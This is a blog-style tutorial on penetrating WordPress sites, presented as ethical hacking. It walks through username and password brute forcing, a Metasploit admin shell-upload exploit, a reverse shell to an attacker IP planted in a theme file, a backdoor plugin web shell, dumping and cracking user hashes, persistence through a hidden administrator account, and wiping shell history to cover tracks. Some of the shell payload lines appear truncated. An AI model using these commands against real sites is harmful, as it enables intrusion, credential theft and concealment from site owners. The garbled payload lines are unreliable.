How to Hack and Penetration Test WordPress Sites | A Complete Ethical Hacking Guide with Real Commands, Tools, and Examples for Beginners and Experts

Table of Contents

• Introduction: Why WordPress is a Prime Target
• Step 1: Information Gathering and Enumeration
• Step 2: Brute Force and Credential Testing
• Step 3: Vulnerability Scanning
• Step 4: Exploitation Techniques
• Step 5: Post-Exploitation
• Step 6: Covering Tracks
• Conclusion
• Frequently Asked Questions (FAQs)

Introduction: Why WordPress is a Prime Target

WordPress powers over 40% of all websites on the internet, making it an attractive target for hackers. Its vast ecosystem of themes, plugins, and third-party integrations makes it feature-rich—but also vulnerable. Ethical hackers and penetration testers need to understand how to assess WordPress installations for misconfigurations, outdated plugins, weak credentials, and exploitable flaws to strengthen the site’s security.

This blog provides a step-by-step approach to hacking and testing WordPress sites using real commands and tools from basic information gathering to advanced exploitation.

Step 1: Information Gathering and Enumeration

1. Check if the Site is Running WordPress

Use the following command with whatweb or Wappalyzer browser extension:

whatweb https://targetsite.com

Output:

https://targetsite.com [200 OK] Country[US], HTML5, HTTPServer[Apache], IP[192.168.0.101], JQuery, PHP, WordPress[6.1.1]

2. Use WPScan to Gather Information

Install WPScan and enumerate usernames, plugins, and themes:

wpscan --url https://targetsite.com --enumerate u,p,t --api-token YOUR_TOKEN

Output:

[+] WordPress version 6.1.1 identified.
[+] Enumerating users...
 | ID: 1 | Login: admin
[+] Enumerating plugins...
 | Contact Form 7 – v5.4.1 – [Vulnerable]

3. Manually Discover wp-login or wp-admin Panel

Try direct access:

https://targetsite.com/wp-login.php
https://targetsite.com/wp-admin/

Use gobuster for brute-force directory enumeration:

gobuster dir -u https://targetsite.com -w /usr/share/wordlists/dirb/common.txt

Step 2: Brute Force and Credential Testing

1. Username Brute Force

wpscan --url https://targetsite.com -e u

2. Password Brute Force Attack

wpscan --url https://targetsite.com --passwords rockyou.txt --usernames admin

Output:

[+] Valid credentials found: admin:123456

⚠️ Only conduct brute-force attacks on sites you own or are authorized to test.

Step 3: Vulnerability Scanning

1. Scan for Known Plugin Vulnerabilities

wpscan --url https://targetsite.com --enumerate vp

2. Use Nikto for Web Vulnerabilities

nikto -h https://targetsite.com

Output:

+ Server: Apache/2.4.29
+ The X-XSS-Protection header is not defined.
+ The site uses outdated WordPress plugins.

Step 4: Exploitation Techniques

1. Exploit Vulnerable Plugin via Metasploit

msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS targetsite.com
set USERNAME admin
set PASSWORD 123456
set TARGETURI /wp-login.php
exploit

Output:

Meterpreter session 1 opened

2. Upload a PHP Shell via Theme Editor

If you have login access, go to:

Appearance > Theme Editor > 404.php

Replace content with a reverse shell:

& /dev/tcp/YOUR_IP/4444 0>&1'"); ?>

3. Backdoor via Malicious Plugin Upload

Zip a fake plugin:

mkdir myplugin && cd myplugin

echo "" > shell.php

zip -r myplugin.zip .

Upload via WordPress admin panel and access:

https://targetsite.com/wp-content/plugins/myplugin/shell.php?cmd=id

Step 5: Post-Exploitation

1. Database Dump

If you gain shell access:

cat wp-config.php

Extract DB credentials and connect:

mysql -u root -p

use wordpress;

select * from wp_users;

Hash cracking:

hashcat -m 400 wp_hash.txt rockyou.txt

2. Persistence via Admin User Creation

wp user create hacker [email protected] --role=administrator --user_pass=pass123 --allow-root

Or via SQL:

INSERT INTO wp_users (user_login, user_pass, user_email, user_status) VALUES ('hacker', MD5('pass123'), '[email protected]', 0);

Step 6: Covering Tracks

Remove logs and uploaded shells:

rm -rf shell.php
rm -rf wp-content/plugins/myplugin/

Clear .bash_history and logs if root:

history -c

cat /dev/null > ~/.bash_history

Conclusion

WordPress hacking and penetration testing is a crucial skill for ethical hackers and security analysts. While WordPress is easy to use, it can be equally easy to exploit if not properly secured. Using tools like WPScan, Metasploit, Nikto, and manual testing techniques, you can identify, exploit, and report vulnerabilities to help make the web safer.

Always perform testing in legal environments like your own servers or approved pentesting labs. Never hack websites without permission—it’s illegal and unethical.

FAQs:

What is WordPress hacking in ethical hacking terms?

WordPress hacking refers to identifying and exploiting vulnerabilities in WordPress sites for ethical testing or improving security.

Why is WordPress a common target for hackers?

WordPress powers over 40% of websites and uses third-party plugins, making it a frequent target for vulnerabilities.

What are the legal requirements before testing a WordPress site?

You must have written permission or own the site to legally perform penetration testing on it.

Which tools are commonly used for WordPress penetration testing?

WPScan, Nikto, WhatWeb, Metasploit, Gobuster, Burp Suite, and Hydra are commonly used.

How does WPScan help in WordPress security auditing?

WPScan identifies core vulnerabilities, plugins, themes, and enumerates usernames.

What command is used to enumerate WordPress users?

wpscan --url https://example.com --enumerate u

Can we brute-force WordPress login using WPScan?

Yes, with the --passwords and --usernames flags using a wordlist like rockyou.txt.

What are common WordPress login pages to target?

/wp-login.php and /wp-admin/ are standard login endpoints.

How do you discover hidden WordPress directories?

Use directory brute-force tools like Gobuster or Dirb with a wordlist.

What is the use of Nikto in WordPress testing?

Nikto scans for outdated software, server misconfigurations, and dangerous scripts.

How do you detect vulnerable plugins or themes?

Using WPScan’s --enumerate vp and --enumerate vt options.

What is the Metasploit module for WordPress admin shell upload?

exploit/unix/webapp/wp_admin_shell_upload

How to use Metasploit to exploit WordPress admin credentials?

By setting USERNAME, PASSWORD, and TARGETURI and executing exploit.

How to access the WordPress database once you have shell access?

Extract credentials from wp-config.php and connect using MySQL.

What kind of data can you extract from wp-config.php?

Database name, username, password, host, and sometimes table prefixes.

What is the process of uploading a reverse shell via theme editor?

Replace theme files like 404.php with PHP reverse shell code.

How do you upload a malicious plugin to gain shell access?

Create a zipped plugin containing PHP shell code and upload via admin dashboard.

Can you create a new admin user through MySQL?

Yes, by inserting a record into the wp_users and wp_usermeta tables.

How do you identify if a WordPress site is running outdated software?

Use WPScan or WhatWeb to detect the WordPress core version.

What is the risk of having many open WordPress plugins?

Each plugin increases the attack surface and may contain unpatched vulnerabilities.

How do you maintain persistence on a compromised WordPress site?

By adding hidden admin users or uploading web shells for future access.

What are common payloads used in WordPress RCE?

Reverse shells, PHP web shells, and command injection payloads.

Can you hide your malicious plugin from WordPress admin users?

Yes, by obfuscating it or modifying WordPress core files to hide it.

What is the role of .htaccess in WordPress hacking?

Attackers may modify .htaccess to redirect traffic, hide malware, or enable backdoors.

How do you clean your traces after WordPress exploitation?

Remove uploaded shells, clear logs, delete users, and empty .bash_history.

Is WordPress security improved with two-factor authentication?

Yes, 2FA significantly reduces the risk of brute-force login attempts.

Can WordPress firewalls block brute force attacks?

Yes, tools like Wordfence or Sucuri can mitigate brute force and scanning attempts.

How do you test WordPress REST API vulnerabilities?

Send crafted API requests to endpoints like /wp-json/wp/v2/users.

What’s the role of bug bounty in WordPress security testing?

Researchers legally report bugs to earn rewards while helping improve security.

Where can I legally test WordPress hacking techniques?

Use platforms like DVWA, Metasploitable, WordPress on localhost, or TryHackMe labs.